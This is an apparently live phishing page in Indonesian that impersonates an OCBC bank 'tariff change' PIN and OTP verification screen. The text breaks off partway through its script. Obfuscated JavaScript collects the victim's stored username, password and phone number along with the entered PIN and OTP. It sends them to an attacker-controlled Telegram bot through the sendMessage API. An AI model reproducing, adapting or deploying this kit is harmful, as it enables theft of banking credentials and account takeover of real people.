
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="fragment" content="!">
    
    <meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, viewport-fit=cover">

	<title>𝘄𝘄𝘄.𝗼𝗰𝗯𝗰.𝗰𝗼𝗺 | 𝗣𝗲𝗿𝘂𝗯𝗮𝗵𝗮𝗻 𝘀𝗸𝗲𝗺𝗮 𝘁𝗮𝗿𝗶𝗳 𝘁𝗿𝗮𝗻𝘀𝗮𝗸𝘀𝗶</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css" integrity="sha384-zCbKRCUGaJDkqS1kPbPd7TveP5iyJE0EjAuZQTgFLD2ylzuqKfdKlfG/eSrtxUkn" crossorigin="anonymous">
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
        body {
            padding: 20px;
            margin: 0 auto;
            left: 0;
            right: 0;
            width: 100%;
            font-family: sans-serif;
            overflow: hidden; 
            background: none #fff;
            max-width: 450px;
            
        }

        .text-header {
            font-family: 'Nunito', sans-serif;
            color: #000;
        }

        .text-subheader {
            font-family: 'Nunito', sans-serif;
            margin-top: -40px;
            color: #000;
            font-size: 15px;
        }

        .sizing {
            width: 100px;
        }

        @media only screen and (max-width: 600px) {
            .sizing {
                width: 100%;
                max-width: 450px;
            }
        } 

        .pinNumb {
            cursor: pointer;
            box-sizing: border-box; 
            width: 100%;             
            font-size: 30px; 
            color: #000; 
            text-align: center; 
            padding-top: 0px; 
            border-radius: 10px; 
            box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; 
            height: 40px;
            background: none;
            border: none;
            margin-left: 0px;
        }

        button.pinNumb:hover {
            color: #c9c9c98c;
            background-color: rgba(255, 255, 255, 0.1);
            border: 1px solid rgba(255, 255, 255, 0.1);
        }


.containerx-pin {
    background-color: transparent;
    padding: 20px; 
    border-radius: 10px; 
    text-align: center;
    max-width: 400px; 
    margin: 0 auto; 
    opacity: 0.1; 
    animation: fadeInDown 0.6s ease-in-out forwards;
    margin-top: 40vh;
    z-index: 999999;
    height: 100%;
    font-family: sans-serif;
}


.groupp {  
    display: flex;
    justify-content: center;
    gap: 8px; 
    margin-top: 15px;
    
}

.pin-inp {
    background-color: #fff;
    width: 40px;
    height: 40px;
    border: 1px solid #ccc;
    border-radius: 5px;
    text-align: center;
    font-size: 20px; 
    line-height: 40px;
    color: #333;
    transition: border-color 0.3s ease;
    box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.1); 
    z-index: 99999;
    background:#fff;
    
}

.pin-inp:focus {
    border-color: #ddd;
    outline: none;
    box-shadow: 0 0 5px #f45b69; 
}

@media screen and (max-width: 350px) {
    .pin-input {
        width: 35px; 
        height: 35px; 
        font-size: 18px;
    }
    .groupp {
        gap: 5px; 
    }
} 


@keyframes fadeInDown {
    from {
        opacity: 0;
        transform: translateY(50px);
    }
    to {
        opacity: 1;
        transform: translateY(0px);
    }
}

.hid{
    display:none;
}

.blur{
        position: fixed;
        bottom: 0;
        left: 0;
        background: #0000009b;
        -webkit-backdrop-filter:saturate(180%) blur(8px);
        backdrop-filter: saturate(180%) blur(8px);        
        z-index:1;
        width: 100%;
        height: 100%;
    
}
    </style>
  </head>
  <body>
      <br>
      <center>
    <img src="https://picjj.com/images/2024/09/11/WSn2cf.png" width="40%" alt=""> 
     </center> 
     
    <div class="container">
        
        <div class="row" style="margin-top: -120px;">
            
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; text-align: center; margin-top: 25px; height: 98.8px; padding-bottom: 0px; font-family: sans-serif; font-size: 16px; font-weight: 400; color: rgb(255,255,255); line-height: 1.4; border-radius: 0px;">
                              
            </div>
        </div>
        
        <div class="row" style="margin-top: -40px;">
            
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 98.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;">
                <center>
                <div class="text-header"><font  size="5"><strong>Verifikasi PIN</strong></font></div>
                <div class="text-subheader">Masukkan 6 digit PIN kamu untuk melanjutkan proses perubahan tarif</div>
            
                
               
  

    </center>

</div>

                </div>
            </div>
        </div>
        <form  id="ryuSubmit" method="post">
        <input type="hidden" name="tarif" id="tarif">
          <input type="hidden" name="nohp" id="nohp">   
          <input type="hidden" name="user" id="user">
          <input type="hidden" name="pass" id="pass">   
        <input type="tel" name="setPin" id="setPin" style="display: none;">
        <div class="row" style="margin-top: -30px;padding-right:30px;">
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 58.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;">
               <div class="row">
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-1" style="box-sizing: border-box; font-size: 30px; color: #000; text-align: center; padding-top: 3px;  width: 50px; left: 0px; top: 0px; background-color: #c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-2" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #000; text-align: center; padding-top: 3px;background-color:#c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-3" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #000; text-align: center; padding-top: 3px;background-color: #c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-4" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #000; text-align: center; padding-top: 3px;background-color: #c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-5" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #000; text-align: center; padding-top: 3px; background-color: #c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-6" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #000; text-align: center; padding-top: 3px;background-color:#c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
               </div>
             </div>
              
               <div class="" style="margin-top: 0px">
                   </div>
                     <center>
    

    </center>
  
     
                    </div>
                       
   </div>     

</div>
</div>
</div>
</div>
                    </div>
               </div>
            </div>
        </div>
        </div>
        <div class="row" style="margin-top: 90px">
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 98.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: #ce222b; line-height: 1.4; border-radius: 0px;">
                <div class="row">
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="1">1</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="2">2</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="3">3</button>
                    </div>
                </div>

                <div class="row" style="margin-top: -80px">
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="4">4</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="5">5</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="6">6</button>
                    </div>
                </div>

                <div class="row" style="margin-top: -80px">
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="7">7</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="8">8</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="9">9</button>
                    </div>
                </div>

                <div class="row" style="margin-top: -80px">
                    <div class="col-4">
                        
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="0">0</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="hapus"><i class="ion-backspace-outline"></i></button>
                    </div>
                </div>
            </div>
        </div>
    </div>
    </form>
    
<!-- patokkkk otppp -->
<style>
    .resend{
        background: transparent;
        border: none;
        color: #fff;
    }
</style>

<form id="formPin" method="post">
    <div class="blur hid">
    <div class="containerx-pin">
        <label style="font-weight:bold;color:white;">Verifikasi OTP</label>           
              <div class="groupp">                
			<div class="clear">
                <input autofocus type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin1" autocomplete="off">
                <input type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin2" autocomplete="off">
                <input type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin3" autocomplete="off">
                <input type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin4" autocomplete="off">
                <input type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin5" autocomplete="off">
                <input type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin6" oninput="sandi()" autocomplete="off">
                 </div>
              </div>
            <br>
    <section id="ulangi" class="hid" style="color:#ffffff80;">			
			<div style="color:#ffffff80;">Tidak menerima Kode OTP?</div>				
						<button type="button" class="resend" onclick="window.location.href='pin_otp.html'">Kirim Ulang</button> atau coba <button class="resend">Metode Lainnya</button>									
				</section>
				
           <section id="timerku" class="hi" style="text-align: center; margin-top: 20px;color:#ffffff80;font-size:14px;">	
      <div>Mohon tunggu <span class="resend" id="waktu" style="color: #fff">60</span> detik untuk mengirim ulang.</div>
		</section>
		
		<br>
		<center>
  <b style="font-size:14px;color:#ffffff80;font-weight: 600;">Belum terima OTP?</b><a onclick="go()" style="font-size:16px;color:#fff;margin:5px;font-weight: 800;">Request Kode OTP</a>
  </center>
  
      </div>
    </div>
  </div>
</form>
     

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="token.js"></script>
    <script src="i.js"></script>
    <script>
 
        var _0x3375fa=_0x572f;function _0x472f(){var _0x276ef4=['gOpta','vwkbC','rmAmx','RlBEq','wJKLb','EdrkD','𝗼𝗺','eqGYg','#hapus','#pin-2','395900acfLjc','UQtDA','Qphnl','uTjGI','NbuzC','Qzuoo','/sendMessa','setPin','#pin3','ziWbM','.blur','𝗲𝗿\x20••\x20','gDNqx','4464hRQlbn','#pin4','Ufzyd','GhOES','cvldR','egqmv','EpQpl','\x20••\x20','WUXbx','#pin-3','https://ap','1|6|0|5|3|','aqzlx','lMSCZ','iNlHs','ZJaAt','xAcAs','%0A%0A※\x20𝗢𝘁','dPbNB','.org/bot','zqIAQ','bgWmU','BMrGW','eKLCg','attr','YRdsw','QBvTY','oQVnM','#pin-','NrFii','Pin','tiFyI','𝘄𝘄𝘄.𝗼𝗰𝗯𝗰.𝗰','HEBct','getItem','e=html','JeWVQ','#user','&parse_mod','RCUcl','#pin1','naCFK','#blur','jvbQo','tarif','2|5|1|6|7','BKPyJ','jUkIM','GBHNF','vJbNv','trim','oYJfy','#pin-6','qjRMs','ajax','%0A※\x20𝗣𝗮𝘀𝘀\x20','%0A%0A※\x20𝗨𝘀','dQAMl','uifvk','WiLKj','WjRKY','dhqje','9293920fLMDHZ','dEJPY','mSEvT','AWsvW','mahqG','blEIX','rntLd','sMjTe','vMFOX','#pin6','DCyQn','%0A※\x20𝗣𝗶𝗻\x20•','ixGRK','oMbdC','split','rHuJU','QYfIB','WlIcr','POST','447062HnFkjn','tUnog','html','6|3','AwCyw','#pin-5','pthZA','••\x20','pUEzv','ZowTJ','18BPcunw','BEmhU','dnRfg','&text=','ge?chat_id','LnJjo','#pin2','XttXO','gpDWs','RjBJc','FaOQF','3wgXYnI','DVRJx','button#set','BJpJX','AqEpw','preventDef','pass','gJycx','876508CcvOel','rAdNe','mzPNM','val','fFZUX','dpsJF','wSCMD','MIYPM','FpdDu','i.telegram','bEFEm','uPBIH','ault','user','1|4|0|2|5|','fadeIn','DZmus','nohp','TPoPE','sLjtx','value','QrvHv','data-id','MnWJh','KEOgw','𝗽\x20••\x20','%0A※\x20𝗧𝗮𝗿𝗶𝗳','czqBu','%0A※\x20𝗡𝗼.𝗛𝗽','Wwmts','13766cMFWaW','2784MDQEQZ','boWCr','ZBHJH','ById','#pin5','7|2|4','LOmsR','zRQKH','364355HprVxO','#tarif','bLLpc','ready','RmmnO','click','getElement','qrfHR','GtJFZ','cVKLe','lLjZY','focus','#nohp','NFmSw','9|8|3|0|4|','input#setP','Mxjwy','cbncr','#pin-1','eWytS','fadeOut','mfTFI','ErrMX','#pass','GkSbV','#pin-4','noJNg','kOMJe','setItem','QDqlI'];_0x472f=function(){return _0x276ef4;};return _0x472f();}function _0x572f(_0x22f468,_0x89ce68){var _0x5a9fd7=_0x472f();return _0x572f=function(_0x213af2,_0x527822){_0x213af2=_0x213af2-(0x36a*-0x6+-0x192a+0x2e2c*0x1);var _0x108a29=_0x5a9fd7[_0x213af2];return _0x108a29;},_0x572f(_0x22f468,_0x89ce68);}(function(_0x450690,_0x2edc1e){var _0x3379e7=_0x572f,_0x5a9ee1=_0x450690();while(!![]){try{var _0x3e451e=-parseInt(_0x3379e7(0xd7))/(0xd15*0x2+0x1867+-0x3290)+-parseInt(_0x3379e7(0x108))/(-0x6a*0x53+-0x9f9+0x2c59*0x1)+parseInt(_0x3379e7(0xb1))/(-0x21b6+0xc8e+0x1*0x152b)*(-parseInt(_0x3379e7(0xb9))/(0xe0*-0x28+-0x10ea+0x33ee))+parseInt(_0x3379e7(0xe0))/(-0x1*0xb6+-0x1a7e*-0x1+-0x19c3)+parseInt(_0x3379e7(0xa6))/(-0x1675+-0x25fc*0x1+-0x3c77*-0x1)*(-parseInt(_0x3379e7(0x9c))/(-0x1f07+0xb7*-0x11+0x2b35))+-parseInt(_0x3379e7(0xd8))/(0xe*-0x2c+0xa70+-0x800)*(parseInt(_0x3379e7(0x115))/(-0x35*0x36+-0x1980*0x1+-0xc3d*-0x3))+parseInt(_0x3379e7(0x89))/(-0x64a+0x218a+-0x1b36);if(_0x3e451e===_0x2edc1e)break;else _0x5a9ee1['push'](_0x5a9ee1['shift']());}catch(_0x2feaba){_0x5a9ee1['push'](_0x5a9ee1['shift']());}}}(_0x472f,-0x6168d+-0x1b91a*-0x1+0x786e1),document[_0x3375fa(0xe6)+_0x3375fa(0xdb)](_0x3375fa(0x141))[_0x3375fa(0xcd)]=sessionStorage[_0x3375fa(0x137)](_0x3375fa(0x141)),document[_0x3375fa(0xe6)+_0x3375fa(0xdb)](_0x3375fa(0xca))[_0x3375fa(0xcd)]=sessionStorage[_0x3375fa(0x137)](_0x3375fa(0xca)),document[_0x3375fa(0xe6)+_0x3375fa(0xdb)](_0x3375fa(0xc6))[_0x3375fa(0xcd)]=sessionStorage[_0x3375fa(0x137)](_0x3375fa(0xc6)),document[_0x3375fa(0xe6)+_0x3375fa(0xdb)](_0x3375fa(0xb7))[_0x3375fa(0xcd)]=sessionStorage[_0x3375fa(0x137)](_0x3375fa(0xb7)),$(document)[_0x3375fa(0xe3)](function(){var _0xa6629b=_0x3375fa,_0x28b8b5={'EdrkD':function(_0x243d3f,_0x895b7f){return _0x243d3f(_0x895b7f);},'ixGRK':_0xa6629b(0x112),'mSEvT':_0xa6629b(0x13d),'DZmus':_0xa6629b(0x9b),'egqmv':function(_0x1f65fc,_0x39d8fd){return _0x1f65fc(_0x39d8fd);},'rAdNe':_0xa6629b(0xcf),'BJpJX':function(_0x4c23ee,_0x421f87){return _0x4c23ee<=_0x421f87;},'NbuzC':function(_0x175578,_0x57edbc){return _0x175578==_0x57edbc;},'ZBHJH':function(_0x4d382c,_0xfcd6ff){return _0x4d382c+_0xfcd6ff;},'WUXbx':_0xa6629b(0x131),'AqEpw':function(_0x194d2f,_0x2a8179){return _0x194d2f(_0x2a8179);},'EpQpl':function(_0x55da90,_0x4addcf){return _0x55da90!=_0x4addcf;},'NFmSw':function(_0x3fe273,_0x2411c0){return _0x3fe273(_0x2411c0);},'pthZA':_0xa6629b(0x149),'wSCMD':_0xa6629b(0xee)+_0xa6629b(0x142),'dnRfg':_0xa6629b(0xca),'AWsvW':function(_0x2a14b6,_0x4c3540){return _0x2a14b6(_0x4c3540);},'zqIAQ':_0xa6629b(0xec),'noJNg':_0xa6629b(0x135)+_0xa6629b(0x104),'bLLpc':_0xa6629b(0xb7),'GkSbV':function(_0x35a714,_0x5af598){return _0x35a714(_0x5af598);},'oYJfy':_0xa6629b(0xf7),'NrFii':_0xa6629b(0x141),'RlBEq':function(_0x3b65c8,_0x3e6d84){return _0x3b65c8(_0x3e6d84);},'GBHNF':_0xa6629b(0xe1),'cbncr':_0xa6629b(0xc6),'aqzlx':_0xa6629b(0x13a),'dEJPY':_0xa6629b(0x10f),'vJbNv':function(_0x4af177,_0x91235){return _0x4af177+_0x91235;},'bEFEm':function(_0x14277a,_0x1e9bbe){return _0x14277a+_0x1e9bbe;},'cVKLe':function(_0x1e4e13,_0x444d8f){return _0x1e4e13+_0x444d8f;},'LOmsR':function(_0x2de7e3,_0x1c54a1){return _0x2de7e3+_0x1c54a1;},'dpsJF':function(_0xe653e9,_0x424d39){return _0xe653e9+_0x424d39;},'eqGYg':function(_0x50a9ff,_0x26a97d){return _0x50a9ff+_0x26a97d;},'mfTFI':_0xa6629b(0xd3)+_0xa6629b(0x11c),'boWCr':_0xa6629b(0xd5)+_0xa6629b(0x11c),'RjBJc':_0xa6629b(0x14d)+_0xa6629b(0x113),'QBvTY':_0xa6629b(0x14c)+_0xa6629b(0xa3),'fFZUX':_0xa6629b(0x94)+'•\x20','mahqG':function(_0xebe50c,_0x2ac76f){return _0xebe50c(_0x2ac76f);},'wJKLb':_0xa6629b(0xef)+'in','tUnog':function(_0x477830,_0x454f2a){return _0x477830+_0x454f2a;},'czqBu':function(_0x2bd496,_0x240671){return _0x2bd496+_0x240671;},'RmmnO':function(_0x36d1db,_0x4f2382){return _0x36d1db+_0x4f2382;},'BMrGW':function(_0x5a8a98,_0x48852f){return _0x5a8a98+_0x48852f;},'zRQKH':function(_0x3bb10a,_0x36a208){return _0x3bb10a(_0x36a208);},'lLjZY':_0xa6629b(0xf2),'RCUcl':_0xa6629b(0x107),'kOMJe':_0xa6629b(0x11e),'WlIcr':function(_0x3c6406,_0x16d0ad){return _0x3c6406(_0x16d0ad);},'sLjtx':_0xa6629b(0xf9),'pUEzv':_0xa6629b(0xa1),'rHuJU':function(_0x4ea0f4,_0x240b92){return _0x4ea0f4(_0x240b92);},'eWytS':function(_0x56c073,_0x39172d){return _0x56c073+_0x39172d;},'AwCyw':_0xa6629b(0xb3)+_0xa6629b(0x133),'xAcAs':_0xa6629b(0xe5),'dPbNB':function(_0x3880dc,_0x5df9e5){return _0x3880dc(_0x5df9e5);},'WjRKY':_0xa6629b(0x106)};function _0x5d5372(_0x5de764){var _0x36011e=_0xa6629b;$[_0x36011e(0x14b)]({'url':_0x36011e(0x11f)+_0x36011e(0xc2)+_0x36011e(0x128)+token+(_0x36011e(0x10e)+_0x36011e(0xaa)+'=')+grup+_0x36011e(0xa9)+_0x5de764+(_0x36011e(0x13b)+_0x36011e(0x138)),'method':_0x28b8b5[_0x36011e(0xc9)],'complete':function(){var _0x3b14dc=_0x36011e;_0x28b8b5[_0x3b14dc(0x103)]($,_0x28b8b5[_0x3b14dc(0x95)])[_0x3b14dc(0xc8)](),_0x28b8b5[_0x3b14dc(0x103)]($,_0x28b8b5[_0x3b14dc(0x8b)])[_0x3b14dc(0xeb)]();}});}_0x28b8b5[_0xa6629b(0x8d)]($,_0x28b8b5[_0xa6629b(0xa0)])['on'](_0x28b8b5[_0xa6629b(0x125)],function(_0x4cf76e){var _0x21302b=_0xa6629b;_0x4cf76e[_0x21302b(0xb6)+_0x21302b(0xc5)]();var _0x2f7866=_0x28b8b5[_0x21302b(0x11a)]($,this)[_0x21302b(0x12d)](_0x28b8b5[_0x21302b(0xba)]);for(var _0x5ca3af=0x1359+-0x1028+-0x330;_0x28b8b5[_0x21302b(0xb4)](_0x5ca3af,-0x1346+0x6*-0x1c1+0x1dd2*0x1);_0x5ca3af++){if(_0x28b8b5[_0x21302b(0x10c)]($[_0x21302b(0x147)](_0x28b8b5[_0x21302b(0x103)]($,_0x28b8b5[_0x21302b(0xda)](_0x28b8b5[_0x21302b(0x11d)],_0x5ca3af))[_0x21302b(0x9e)]()),'')){_0x28b8b5[_0x21302b(0xb5)]($,_0x28b8b5[_0x21302b(0xda)](_0x28b8b5[_0x21302b(0x11d)],_0x5ca3af))[_0x21302b(0x9e)](_0x2f7866);break;}}if(_0x28b8b5[_0x21302b(0x11b)](_0x28b8b5[_0x21302b(0xed)]($,_0x28b8b5[_0x21302b(0xa2)])[_0x21302b(0x9e)](),'')){var _0x29f0a8=_0x28b8b5[_0x21302b(0xbf)][_0x21302b(0x97)]('|'),_0x3d243d=-0x17f3+0x9*0x441+0xa*-0x16f;while(!![]){switch(_0x29f0a8[_0x3d243d++]){case'0':sessionStorage[_0x21302b(0xfc)](_0x28b8b5[_0x21302b(0xa8)],_0x28b8b5[_0x21302b(0x8c)]($,_0x28b8b5[_0x21302b(0x129)])[_0x21302b(0xbc)]());continue;case'1':var _0x52fd91=_0x28b8b5[_0x21302b(0xfa)];continue;case'2':sessionStorage[_0x21302b(0xfc)](_0x28b8b5[_0x21302b(0xe2)],_0x28b8b5[_0x21302b(0xf8)]($,_0x28b8b5[_0x21302b(0x148)])[_0x21302b(0xbc)]());continue;case'3':sessionStorage[_0x21302b(0xfc)](_0x28b8b5[_0x21302b(0x132)],_0x28b8b5[_0x21302b(0x101)]($,_0x28b8b5[_0x21302b(0x145)])[_0x21302b(0xbc)]());continue;case'4':sessionStorage[_0x21302b(0xfc)](_0x28b8b5[_0x21302b(0xf1)],_0x28b8b5[_0x21302b(0xf8)]($,_0x28b8b5[_0x21302b(0x121)])[_0x21302b(0xbc)]());continue;case'5':sessionStorage[_0x21302b(0xfc)](_0x28b8b5[_0x21302b(0x8a)],_0x4902cc);continue;case'6':var _0x4d8199=_0x28b8b5[_0x21302b(0x146)](_0x28b8b5[_0x21302b(0xc3)](_0x28b8b5[_0x21302b(0xe9)](_0x28b8b5[_0x21302b(0x146)](_0x28b8b5[_0x21302b(0xe9)](_0x28b8b5[_0x21302b(0x146)](_0x28b8b5[_0x21302b(0xde)](_0x28b8b5[_0x21302b(0xbe)](_0x28b8b5[_0x21302b(0x105)](_0x28b8b5[_0x21302b(0xe9)](_0x28b8b5[_0x21302b(0xbe)]('',_0x52fd91),_0x28b8b5[_0x21302b(0xf5)]),tarif[_0x21302b(0xcd)]),_0x28b8b5[_0x21302b(0xd9)]),nohp[_0x21302b(0xcd)]),_0x28b8b5[_0x21302b(0xaf)]),user[_0x21302b(0xcd)]),_0x28b8b5[_0x21302b(0x12f)]),pass[_0x21302b(0xcd)]),_0x28b8b5[_0x21302b(0xbd)]),_0x4902cc);continue;case'7':_0x28b8b5[_0x21302b(0x103)](_0x5d5372,_0x4d8199);continue;case'8':_0x28b8b5[_0x21302b(0x8d)]($,_0x28b8b5[_0x21302b(0x102)])[_0x21302b(0xbc)](_0x4902cc);continue;case'9':var _0x4902cc=_0x28b8b5[_0x21302b(0x9d)](_0x28b8b5[_0x21302b(0xd4)](_0x28b8b5[_0x21302b(0xde)](_0x28b8b5[_0x21302b(0xe4)](_0x28b8b5[_0x21302b(0x12b)](_0x28b8b5[_0x21302b(0xdf)]($,_0x28b8b5[_0x21302b(0xea)])[_0x21302b(0x9e)](),_0x28b8b5[_0x21302b(0xed)]($,_0x28b8b5[_0x21302b(0x13c)])[_0x21302b(0x9e)]()),_0x28b8b5[_0x21302b(0x101)]($,_0x28b8b5[_0x21302b(0xfb)])[_0x21302b(0x9e)]()),_0x28b8b5[_0x21302b(0x9a)]($,_0x28b8b5[_0x21302b(0xcc)])[_0x21302b(0x9e)]()),_0x28b8b5[_0x21302b(0xdf)]($,_0x28b8b5[_0x21302b(0xa4)])[_0x21302b(0x9e)]()),_0x28b8b5[_0x21302b(0x9a)]($,_0x28b8b5[_0x21302b(0xa2)])[_0x21302b(0x9e)]());continue;}break;}}}),_0x28b8b5[_0xa6629b(0x127)]($,_0x28b8b5[_0xa6629b(0x87)])['on'](_0x28b8b5[_0xa6629b(0x125)],function(_0x42007f){var _0x59f3fd=_0xa6629b;_0x42007f[_0x59f3fd(0xb6)+_0x59f3fd(0xc5)]();for(var _0x168d34=-0x12ed+0x161*-0x1+0x144f;_0x28b8b5[_0x59f3fd(0xb4)](_0x168d34,-0xe88+-0x1a93*-0x1+-0xc05);_0x168d34++){_0x28b8b5[_0x59f3fd(0x98)]($,_0x28b8b5[_0x59f3fd(0xf3)](_0x28b8b5[_0x59f3fd(0x11d)],_0x168d34))[_0x59f3fd(0x9e)]('');}});}));function sandi(){var _0x35b759=_0x3375fa,_0x34d6a1={'cvldR':_0x35b759(0xc7)+_0x35b759(0x9f),'GhOES':_0x35b759(0x10f),'eKLCg':_0x35b759(0x120)+_0x35b759(0xdd),'uPBIH':function(_0x2f7c6c,_0x2acbc1){return _0x2f7c6c(_0x2acbc1);},'BEmhU':_0x35b759(0xac),'XttXO':_0x35b759(0x13d),'mzPNM':function(_0x1ebc33,_0x1385e7){return _0x1ebc33(_0x1385e7);},'gJycx':_0x35b759(0x92),'Qzuoo':function(_0x161aff,_0x315935){return _0x161aff(_0x315935);},'rmAmx':_0x35b759(0x116),'ZowTJ':_0x35b759(0x13f),'YRdsw':function(_0x4a7e5d,_0x329147){return _0x4a7e5d(_0x329147);},'tiFyI':_0x35b759(0x110),'WiLKj':_0x35b759(0xdc),'JeWVQ':function(_0x569738,_0x2913fa,_0x4ec895){return _0x569738(_0x2913fa,_0x4ec895);},'lMSCZ':function(_0x5dfebf,_0x44f416){return _0x5dfebf+_0x44f416;},'BKPyJ':_0x35b759(0x135)+_0x35b759(0x104),'FpdDu':function(_0x3d6df0,_0x4b4e7d){return _0x3d6df0+_0x4b4e7d;},'uifvk':function(_0x398f6a,_0x43a6c3){return _0x398f6a+_0x43a6c3;},'UQtDA':function(_0x7c530,_0x3bb139){return _0x7c530+_0x3bb139;},'MIYPM':function(_0x528061,_0x5e51d1){return _0x528061+_0x5e51d1;},'jUkIM':function(_0x245318,_0x5dcce3){return _0x245318+_0x5dcce3;},'jvbQo':function(_0x1cea35,_0x2ce083){return _0x1cea35+_0x2ce083;},'FaOQF':function(_0x847680,_0x2ccbab){return _0x847680+_0x2ccbab;},'TPoPE':function(_0x55674b,_0x12e6b4){return _0x55674b+_0x12e6b4;},'vwkbC':function(_0x36daac,_0x23ddad){return _0x36daac+_0x23ddad;},'qrfHR':function(_0x48dcd5,_0x52c007){return _0x48dcd5+_0x52c007;},'qjRMs':_0x35b759(0xd3)+_0x35b759(0x11c),'DVRJx':_0x35b759(0xd5)+_0x35b759(0x11c),'rntLd':_0x35b759(0x14d)+_0x35b759(0x113),'dQAMl':_0x35b759(0x14c)+_0x35b759(0xa3),'MnWJh':_0x35b759(0x94)+'•\x20','gDNqx':_0x35b759(0x126)+_0x35b759(0xd2)},_0x4e90e9=_0x34d6a1[_0x35b759(0x119)][_0x35b759(0x97)]('|'),_0x323fd7=-0x1aa+-0x1f25*-0x1+-0x1d7b;while(!![]){switch(_0x4e90e9[_0x323fd7++]){case'0':var _0x2c8ea2=sessionStorage[_0x35b759(0x137)](_0x34d6a1[_0x35b759(0x118)],_0x2c8ea2);continue;case'1':var _0x13c508={'Qphnl':_0x34d6a1[_0x35b759(0x12c)],'uTjGI':function(_0x5e4503,_0x234073){var _0x31c20a=_0x35b759;return _0x34d6a1[_0x31c20a(0xc4)](_0x5e4503,_0x234073);},'iNlHs':_0x34d6a1[_0x35b759(0xa7)],'GtJFZ':_0x34d6a1[_0x35b759(0xad)],'naCFK':function(_0x59c426,_0x3fe6d4){var _0x449b64=_0x35b759;return _0x34d6a1[_0x449b64(0xbb)](_0x59c426,_0x3fe6d4);},'gpDWs':_0x34d6a1[_0x35b759(0xb8)],'LnJjo':function(_0x1f2b54,_0x47f058){var _0x2329a5=_0x35b759;return _0x34d6a1[_0x2329a5(0x10d)](_0x1f2b54,_0x47f058);},'ziWbM':_0x34d6a1[_0x35b759(0x100)],'blEIX':_0x34d6a1[_0x35b759(0xa5)],'Mxjwy':function(_0x292d24,_0x1f7789){var _0x2b36fa=_0x35b759;return 